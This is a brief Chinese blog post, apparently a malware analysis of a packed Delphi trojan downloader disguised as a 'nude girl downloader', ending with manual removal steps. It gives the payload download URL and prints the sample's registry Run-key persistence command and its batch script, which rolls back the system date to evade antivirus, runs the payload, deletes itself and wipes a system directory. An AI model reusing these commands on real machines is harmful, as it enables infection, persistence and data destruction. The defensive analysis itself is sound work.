查看文章 |
裸女下载器 用hmimys-packer1.0+ASPack 2.x (without poly) -> Alexey Solodovnikov双重壳保护.原始大小29.5K,脱掉双重壳后大小130K,Borland Delphi 6.0 - 7.0编写,老样子 改时间过咔吧,建批处理来删除自己,然后下载木马!建立autorun感染驱动器.
该下载器会将自己复制到system32下servet.exe文件,并且把http://lzw79.3322.org/11.exe下载到用户目录下的temp下改名Microsoft.com,自己还会在Microsoft.com的同一目录下产生一个Microsoft.vbs脚本来运行Microsoft.com. 运行后会在system生成一堆垃圾! ![]() reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date% date 2000-01-01 @echo off & setlocal enableextensions echo WScript.Sleep 1000 > %system%.\run$.vbs set /a i = 10 :Timeout if %i% == 0 goto Next setlocal set /a i = %i% - 1 cscript //nologo %system%.\ run$.vbs goto Timeout goto End :Next %systemroot%\system\11.exe copy %systemroot%\system\run.pif %systemroot%\system32\ for %%f in (%system%.\run$.vbs*) do del %%f date %date% RD /S /Q %systemroot%\system\ 添加开机启动,有改时间过咔吧,删除自己,把自己烤到system32下 清除
把每个驱动器下的AutoRun.inf和他对应的exe删了,在把system32下的11.exe和servet.exe删了,优化一下开机启动就完成了!
|
